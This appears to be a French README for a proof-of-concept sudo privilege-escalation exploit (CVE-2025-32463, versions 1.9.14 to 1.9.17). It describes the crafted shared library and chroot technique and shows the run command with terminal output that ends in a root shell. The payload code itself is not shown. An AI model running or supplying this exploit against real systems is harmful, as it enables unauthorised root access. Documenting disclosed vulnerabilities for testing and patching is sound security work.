
Exploit de preuve de concept pour CVE-2025-32463, une vulnérabilité sudo chroot dans les versions 1.9.14-1.9.17. Automatise l'escalade de privilèges vers root via une bibliothèque partagée conçue et un environnement chroot.
Versions affectées 1.9.14 à 1.9.17
bash run.sh
Exécution réussie ci-dessous
neko@aosc-neko205 [ CVE-2025-32463_Exploit@main ] $ bash run.sh
[+] Script de reproduction de la vulnérabilité CVE-2025-32463 sudo chroot
[*] Création du répertoire de travail temporaire...
[*] Répertoire de travail créé : /tmp/sudo_exploit.nc0EjT
[*] Création du payload en C (woot1337.c)...
[*] Configuration de l'environnement chroot et du nsswitch.conf malveillant...
[*] Compilation du payload en bibliothèque partagée (libnss_/woot1337.so.2)...
[*] Compilation réussie !
[+] shell root !!!!!
woot!
root@aosc-neko205 [ / ] # id
uid=0(root) gid=0(root) groupes=0(root),11(audio),12(video),15(cdrom),974(ollama),997(wheel),999(plugdev),1001(neko),1002(gamemode)
root@aosc-neko205 [ / ] # exit